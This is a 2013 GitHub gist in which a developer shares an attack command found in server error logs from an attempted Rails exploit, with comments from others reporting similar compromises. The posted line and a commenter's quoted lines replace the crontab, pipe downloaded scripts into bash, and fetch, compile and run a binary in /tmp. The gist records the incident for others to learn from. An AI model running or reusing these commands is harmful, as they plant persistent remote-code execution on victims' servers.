Skip to content

Instantly share code, notes, and snippets.

Created May 25, 2013 04:55
Show Gist options
  • Save ismasan/5647955 to your computer and use it in GitHub Desktop.
Save ismasan/5647955 to your computer and use it in GitHub Desktop.
Some asshole tried to access my servers and run this (they couldn't)
crontab -r; echo \"1 * * * * wget -O -|bash;wget -O -|bash;wget -O -|bash;\"|crontab -;wget -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget -O /tmp/k && chmod +x /tmp/k && /tmp/k
Copy link

tadman commented May 28, 2013

You can test for vulnerable versions in applications automatically with GemCanary which can be especially helpful if you have a large number of applications and lose track of some of them from time to time. I've found it presents the various alerts in a context that's relevant to you based on your Gemfile.lock.

Copy link

ismasan commented May 28, 2013

Wow. I think this needs some clarification. I was not who posted it to HN. This is a rather old Rails vulnerability that has since been patched and explained. It was all over the internet back in January. I updated my apps as soon as the patches were made available and none of my servers were ever successfully attacked in this way. I just spotted the backtraces in my error logs and posted the offending code here for reference.

All the comments and discussion are appreciated but I will suggest that if you were affected by this and plan to start a discussion then use your own fork and attribution. Thanks!

Copy link


an what about my configuration ??

Server version: Apache/2.2.14 (Ubuntu)
Rails 3.2.3
ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux]

no nginx, no rails 3.2.1, no redmine, no yalm problem, but I had the same problem detailed below :

  • k.c, k and ka files in /var/tmp (probably irc script)
  • an new line in my crontab executing some wget like this :

wget -O /var/tmp/k.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka‏

wget -O -|bash;wget -O -|bash;wget -O -

wget -O /var/tmp/k && chmod +x /var/tmp/k && /var/tmp/k‏

I do not find any suspect trace in my apache log, but there were some actions under fail2ban ( I didn't look deep at it anymore since chmod and update www-data cron resolve my problem as describe above).

I'm still searching how the malicious scripts were upload to my server ...

Copy link


my server was infected too, should I do a reinstall? Or should removing the files and upgrading rails be enough?

Copy link

my server was infected too, should I do a reinstall?


Copy link

Leglaw commented May 29, 2013

@Netmisa : I've since uninstalled PhpMyAdmin from my server, but I was using one installed by apt-get -- 3.4.5-1.

Copy link

Netmisa commented May 30, 2013

Ok, anyway we known now where the problem comes from.

Copy link

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment